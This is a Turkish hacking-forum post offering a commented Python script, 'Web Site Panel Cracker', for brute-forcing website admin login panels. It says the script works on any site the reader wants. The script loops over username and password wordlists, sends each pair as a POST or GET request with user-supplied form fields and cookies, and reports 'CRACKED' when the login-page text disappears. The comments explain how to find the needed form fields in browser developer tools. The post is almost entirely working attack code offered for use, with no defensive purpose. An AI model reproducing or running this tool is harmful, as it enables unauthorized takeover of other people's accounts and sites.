Admin Panel Brute Force I Python

  • Hack kategorilerindeki birçok içerik Gizli içeriktir yani sadece cevap yazarakı erişebileceğiniz türden içeriklerdir, ancak yeni üyelerin hack kategorilerine cevap yazması engellenmiştir ! spam ve sömürüye karşı bir tedbirdir, forumumuza katkı sunarsanız rütbeniz kısa sürede yükselir ve tüm forumu engelsiz kullanabilirsiniz.

LQM33

Defacer | Exploiter | Developer
Moderator
Katılım
Tem 2, 2020
Mesajlar
480
Tepkime puanı
268
Puanları
63
Konum
Turkey-Marmara
İstediğiniz siteye brute force yapabilicekseniz hemde basit python kodları ile.


Şimdi kodlarımı açıklıyım;
Kod:
print("""
██╗      ██████╗ ███╗   ███╗██████╗ ██████╗
██║     ██╔═══██╗████╗ ████║╚════██╗╚════██╗
██║     ██║   ██║██╔████╔██║ █████╔╝ █████╔╝
██║     ██║▄▄ ██║██║╚██╔╝██║ ╚═══██╗ ╚═══██╗
███████╗╚██████╔╝██║ ╚═╝ ██║██████╔╝██████╔╝
╚══════╝ ╚══▀▀═╝ ╚═╝     ╚═╝╚═════╝ ╚═════╝
instagram:lqm33.py
WEB SİTE PANEL CRACKER
""")# Üç tırnak ile bannerimizi koyduk
#coded by lqm33
url=input("Enter the url...:")#urlyi input ile aldırdık
usernamelist=input("Username List ...:")#username listi aldırdık
passlist=input("Password List ...:")#passlisti aldırdık
###############################
#burası önemli siteye istek atarken login yaptırırken vs
#istek atarız bunu yapmak için payload yazmamız gerekiyor
# payloadlar örnek olarak
# login: asdgsdgasd
# password: asdgasdgasdg
# login ekranına girip sağ tıklayın incele yapın
# network kısmına gelin all 'ı seçin
# login ekranın da rastgele birşey girin
# sonra login butonuna tıklayın
#incele ekranında  solda en üstte login formu bulunur
# orda girdiğiniz datalar vardır onları giricez buraya
# yani login: asdgsdgasd password: asdgasdgasdg
# böyle bir us pass girdiysem

username=input("Username Header ...:") #buraya login
passwrodt=input("Password Header ...:") # buraya da password
# unutmayın her sitede değişir !
# login butonu yani aynı incele network yerinde
# submit butonu vardır yoksa da yoktur
#yani diyelim sub headerımız wp-submit:sub
subbutton=input("Submit Header ...:")# sub butonu -->wp-submit
# sub value ise sub headerının yanın da ki değeridir
subbuttonv=input("Submit Header Value ...:")# sub butonu değeri -->sub
#login etmek için cookie kullanmamız gerekiyo
cookiename=input("COOKİE NAME...:")#yine incele de network de görülür onları girin
cookievalue=input("COOKİE Value...:")
# login girişinde olup admin panel de olmayan yazı giriniz
# mesela Giriş Yap
change=input("Write what happens on the PAGE...:")# Login ekranın da ki yazı
import requests
import sys
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36'
    }# useragent tanımladık yoksa bağlantımız kabul edilmez
method=input("POST or GET ?...:")#post mu get mi onu giriceksiniz
#incele > network orda yine var en üstte
if method=="POST" or method=="post":# eğer post yazılmışsa post işlemini yap
    with open(usernamelist,"r")as user:#usernamelist i oku user değişkenine at
        for tryuser in user: # for ile içine gir
            tryuser= tryuser.replace('\n','')#\n yani satırları boşluka çevir tryuser değişkenine ata
            
            with open(passlist,"r")as passaaa:# aynılarını passlist için yap
                for sifre in passaaa:
                    sifre=sifre.replace('\n','')
                    payload={username:tryuser,passwrodt:sifre,subbutton:subbuttonv}# payload
                    #login ekranına payloadları gönderiyoruz
                    cookies={cookiename:cookievalue}#cookiesleri giriyoruz
                    r=requests.post(url,headers=headers,data=payload,cookies=cookies)
                    # ve gönderiyoruz
                    # r değişkenine atadık
                    if change not in r.text:# eğer chane not in(inputlattırdığımız şey)
                    # r.text yani sayfa da yoksa # ekrana kırıldı de ve programdan çık
                        print("CRACKED--> "+tryuser+" "+sifre)
                        sys.exit()
                    else:# else yani yukarıdaki dışında bir durumsa başarısız de ve devam et
                    #program for da olduğu için listelerin hepsini deniyo
                        print("unsuccessful--> "+tryuser+" "+sifre)
elif method=="GET" or method=="get":# aynı işlemler sadece get metodu
    with open(usernamelist,"r")as user:
        for tryuser in user:
            tryuser= tryuser.replace('\n','')
            with open(passlist,"r")as passaaa:
                for sifre in passaaa:
                    sifre=sifre.replace('\n','')
                    payload={username:tryuser,passwrodt:sifre,subbutton:subbuttonv}
                    cookies={cookiename:cookievalue}
                    r=requests.get(url,headers=headers,data=payload,cookies=cookies)
                    # get isteği attık
                    if change not in r.text:
                        print("CRACKED--> "+tryuser+" "+sifre)
                        sys.exit()
                        
                    else:
                        print("unsuccessful--> "+tryuser+" "+sifre)

Kodların Tümü
https://github.com/lqm33/PanelCracker/
 
  • Like
Tepkiler: r00ter21